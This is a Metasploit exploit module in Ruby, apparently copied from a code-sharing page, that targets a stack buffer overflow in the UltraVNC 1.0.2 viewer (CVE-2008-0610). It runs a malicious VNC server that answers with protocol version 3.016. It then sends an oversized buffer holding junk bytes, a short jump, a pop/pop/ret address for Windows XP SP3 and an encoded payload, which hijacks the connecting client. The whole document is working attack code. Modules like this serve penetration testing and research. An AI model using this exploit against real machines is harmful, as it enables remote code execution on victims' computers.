Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::TcpServer
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.
16

17
        If a malicious server responds to a client connection indicating a minor
18
        protocol version of 14 or 16, a 32-bit integer is subsequently read from
19
        the TCP stream by the client and directly provided as the trusted size for
20
        further reading from the TCP stream into a 1024-byte character array on
21
        the stack.
22
      },
23
      'Author'         => 'noperand',
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '2008-0610' ],
28
          [ 'OSVDB', '42840' ],
29
          [ 'BID', '27561' ],
30
        ],
31
      'DefaultOptions' =>
32
        {
33
          'EXITFUNC' => 'thread',
34
        },
35
      'Payload'        =>
36
        {
37
          'Space'    => 500,
38
        },
39
      'Platform'       => 'win',
40
      'Targets'        =>
41
        [
42
          [ 'Windows XP SP3',	{ 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
43
        ],
44
      'Privileged'     => false,
45
      'DisclosureDate' => '2008-02-06',
46
      'DefaultTarget'  => 0))
47

48
    register_options(
49
      [
50
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
51
      ])
52
  end
53

54
  def on_client_connect(client)
55
    return if ((p = regenerate_payload(client)) == nil)
56

57
    sploit = rand_text_alpha(1100)   	# junk, could be more efficient here
58
    sploit << "\x00\x04\x00\x00" 	 	# value to get around a write
59
    sploit << rand_text_alpha(12)	 	# random junk
60
    sploit << "\xEB\x06" << make_nops(2)	# short relative jump
61
    sploit << [target.ret].pack('V') 	# pop/pop/ret (default is in vncviewer.exe)
62
    sploit << payload.encoded
63

64
=begin
65
    We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").
66
    - These bytes are read directly by a call to ReadExact() with a size of 12.
67

68
    ...
69
    if (m_minorVersion == 14 || m_minorVersion == 16)
70
    {
71
      int size;
72
      ReadExact((char *)&size,sizeof(int));
73
      char mytext[1024]; //10k
74
      ReadExact(mytext,size);
75
      mytext[size]=0;
76
    ...
77

78
    If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
79
    We then append our data.
80
=end
81
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit
82

83
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
84
    client.put(sploit)
85
    handler(client)
86
    service.close_client(client)
87
  end
88
end
89

90